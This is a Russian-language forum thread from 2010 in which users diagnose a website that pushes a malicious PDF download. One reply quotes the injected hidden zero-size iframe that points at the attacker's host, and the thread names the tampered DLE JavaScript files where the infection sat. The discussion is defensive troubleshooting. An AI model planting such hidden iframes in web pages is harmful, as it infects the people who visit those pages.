Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » помогите отыскать вирус

Ответить
Настройки темы
помогите отыскать вирус

Аватара для AACC

Пользователь


Сообщения: 146
Благодарности: 2

Профиль | Отправить PM | Цитировать


Изменения
Автор: Sham
Дата: 22-02-2010
Описание: ссылки...
При заходе на сайт ripbox_ru (вернее при первом заходе) если сменить IP то выскочит снова

выскакивает в менеджере загрузок файл и просится счкачать - _http://herewereytinj.com/tera/sv777/pdf.php после скачивания получается файл типа s85LQp3BqohkWX8OXrI2d.pdf (каждый раз другой выходит)

как я понял это разновидность pdf.php вируса

я сообщил админу того сайта... он проверил все шаблоны но вируса не обнаружил
проверка тут http://sitedrill.ru/ripbox.ru показывает что сайт чистый
но всё таки после каждого смена айпи адреса вылазит этот файл на закачку

куда могли спрятать вирус? как определить?

Отправлено: 17:03, 21-02-2010

 

Deadooshka


Сообщения: 2521
Благодарности: 693

Профиль | Отправить PM | Цитировать


скрытую загрузку можно по-разному сделать, в т.ч. через редирект...
Цитата AACC:
я сообщил админу того сайта... он проверил все шаблоны но вируса не обнаружил »
хехе... за такие загрузки ему мб денюжка капает...

тема перенесена из раздела "Вебмастеру"

Последний раз редактировалось Sham, 22-02-2010 в 17:58.


Отправлено: 16:47, 22-02-2010 | #2



Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.


Аватара для sanek_freeman

Ветеран


Сообщения: 2240
Благодарности: 489

Профиль | Отправить PM | Цитировать


AACC, здравствуйте. Выполните рекомендации и прикрепите к следующему сообщению полученные логи.

-------
Сравнительная таблица по процессорам | Сравнительная таблица производительности видеокарт AMD(ATI) и Nvidia | Выбор конфигурации компьютера

Ассоциация VIRUSNET и обучение методам лечения систем от вредоносных программ

Сообщение помогло? Оказалось полезным? Хотите сказать "Спасибо"? - Смело нажимайте кнопку "Полезное сообщение"!
Проблема в вашей теме Решена? - Отметьте её решенной в настройках темы.


Отправлено: 17:22, 22-02-2010 | #3


Аватара для AACC

Пользователь


Сообщения: 146
Благодарности: 2

Профиль | Отправить PM | Цитировать


Sham, тот админ к этим загрузкам не причем... он сам попросил меня чтоб я гдето спросил

sanek_freeman, мне не мой компьютор лечить нужно, а тот сайт

Отправлено: 19:40, 22-02-2010 | #4


Аватара для Drongo

Будем жить, Маэстро...


Сообщения: 6694
Благодарности: 1393

Профиль | Сайт | Отправить PM | Цитировать


Цитата AACC:
мне не мой компьютор лечить нужно, а тот сайт »
Зарегистрируйтесь на форуме и оставьте заявку в этой теме - Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте тут

-------
Правильная постановка вопроса свидетельствует о некотором знакомстве с делом.
3нание бывает двух видов. Мы сами знаем предмет — или же знаем, где найти о нём сведения.
[Quick Killer 3.0 Final [OSZone.net]] | [Quick Killer 3.0 Final [SafeZone.cc]] | [Парсер логов Gmer] | [Парсер логов AVZ]

http://tools.oszone.net/Drongo/Userbar/SafeZone_cc.gif

Это сообщение посчитали полезным следующие участники:

Отправлено: 19:52, 22-02-2010 | #5


Deadooshka


Сообщения: 2521
Благодарности: 693

Профиль | Отправить PM | Цитировать


вверху, где баннер, каким-то скриптом суется iframe
HTML код: Выделить весь код
<iframe width="0" height="0" src="http://herewereytinj.com/tera/sv777/index.php"></iframe>

очевидно, в него и подгружается pdf со скриптом (который выполняется очевидно только акробат-ридере).

Рекламные скрипты размещает админ, значит, пусть проверяет все скрипты рекламодателей.
Это сообщение посчитали полезным следующие участники:

Отправлено: 20:49, 22-02-2010 | #6


Аватара для AACC

Пользователь


Сообщения: 146
Благодарности: 2

Профиль | Отправить PM | Цитировать


спасибо всем за помощь

сайт от вирусов отчистился... вирус скрывался в JS файлах
в данном случаи они скрывались в папке \engine\ajax
menu.js
js_edit.js
dle_ajax.js

админ перелил на оригенальные файлы и вирус исчез

вопрос как можно было их изменить так чтоб дата редактирования не изменилась?

п.с.

кстати есть для примера 1 файл с вирусом
если хотите могу показать

я его проверил касперским и там оказался вирус

Отправлено: 01:40, 23-02-2010 | #7


Deadooshka


Сообщения: 2521
Благодарности: 693

Профиль | Отправить PM | Цитировать


Сейчас скрытый фрейм как и был, никуда не исчез, но src редиректит на 404 (удален из удаленного хоста).

Отправлено: 01:48, 23-02-2010 | #8


Аватара для AACC

Пользователь


Сообщения: 146
Благодарности: 2

Профиль | Отправить PM | Цитировать


Sham, каким способом ты видишь скрытый фрейм?

Отправлено: 01:50, 23-02-2010 | #9


Deadooshka


Сообщения: 2521
Благодарности: 693

Профиль | Отправить PM | Цитировать


FF + noscript (вверху слева квадратик - типа заблокирован фрейм), или через DOM (например, FF + firebug).

Теперь исчез вроде , видимо у меня в кэше завалялось...
Это сообщение посчитали полезным следующие участники:

Отправлено: 01:56, 23-02-2010 | #10



Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » помогите отыскать вирус

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
Помогите отыскать зловред Zusul777 Лечение систем от вредоносных программ 3 03-02-2010 22:15
Flash - На Flashке вирус....ПОМОГИТЕ!!! foxika Лечение систем от вредоносных программ 1 12-07-2009 23:32
Антивирусы - Помогите обнаружить вирус Лина Лечение систем от вредоносных программ 4 20-03-2008 22:47




 
Переход